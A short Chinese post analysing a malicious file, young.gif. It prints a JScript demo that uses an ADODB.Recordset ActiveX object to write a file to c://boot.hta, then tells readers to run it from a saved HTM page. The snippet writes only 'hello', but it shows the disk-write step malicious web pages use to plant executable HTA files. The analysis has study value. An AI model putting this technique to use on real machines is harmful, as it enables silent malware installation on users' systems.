利用ADODB写文件——恶意文件young.gif代码的分析心得1
<html> <HEAD></HEAD> </HTML> <SCRIPT language=JScript> try { var strHello = "hello"; //利用ADODB写文件 Rfuc1k1S=new ActiveXObject("ADODB.Recordset"); Rfuc1k1S.Fields.Append("love", 200, 3000); mike=1; Rfuc1k1S.Open(); mike=1; Rfuc1k1S.AddNew(); mike=1; Rfuc1k1S.Fields("love").Value = strHello; } catch(e) {} Rfuc1k1S.Update(); try { Rfuc1k1S.Save("c://boot.hta" ,0); //保存为c:/boot.hta } catch(e) {} </SCRIPT> </BODY> </HTML>
把它复制/粘贴到记事本里,保存为HTM文件,双击运行。
看看c:/boot.hta是否出来了?
![[PiKaChu靶场通关]不安全文件下载---Unsafe Filedownload](https://ucc.alicdn.com/pic/developer-ecology/36d77d2e2d8741b4bfa9580f258d5be5.png?x-oss-process=image/resize,h_160,m_lfit)